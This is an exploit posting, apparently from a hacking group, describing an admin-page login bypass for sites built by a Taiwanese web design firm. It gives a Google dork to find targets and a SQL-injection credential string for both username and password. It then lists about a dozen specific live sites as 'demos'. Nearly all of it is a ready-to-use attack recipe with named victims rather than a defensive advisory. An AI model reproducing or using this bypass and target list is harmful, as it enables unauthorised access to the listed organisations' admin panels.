|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------In The Name Of God------------------------| |[+] Exploit Title: Designed by 和雅網頁設計 Admin Page Bypass |[+] Exploit Author: Ashiyane Digital Security Team |[+] Vendor Homepage: http://www.herya.com.tw/ |[+] Google Dork: intitle:"後端管理員" /admin/login.php |[+] Tested on: Windows 10 && Google Chrome && Mozilla Firefox |[+] Date: 05 Feb. 2016 |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Then Choose a Target and put this after URL : /admin/login.php |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] And fill username and password like the information below : |[+] Username : '=''or' |[+] Password : '=''or' |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Demos : |[+] http://www.ihara.com.tw/admin/login.php |[+] http://www.herya.com.tw/admin/login.php |[+] http://www.tsaoyujui.com.tw/admin/login.php |[+] http://www.xuanyi.org.tw/admin/login.php |[+] http://www.daikopack.com/admin/login.php |[+] http://www.ctaf.com.tw/admin/login.php |[+] http://www.airhcs.org.tw/admin/login.php |[+] http://www.kingway-organic.com.tw/admin/login.php |[+] http://www.chewan.com.tw/admin/login.php |[+] http://www.cgg-vghtc.org.tw/admin/login.php |[+] http://www.sen-yuan.com.tw/admin/login.php |[+] http://www.ming-chung.com.tw/admin/login.php |[+] http://www.ps-b.com.tw/admin/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : modiret |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|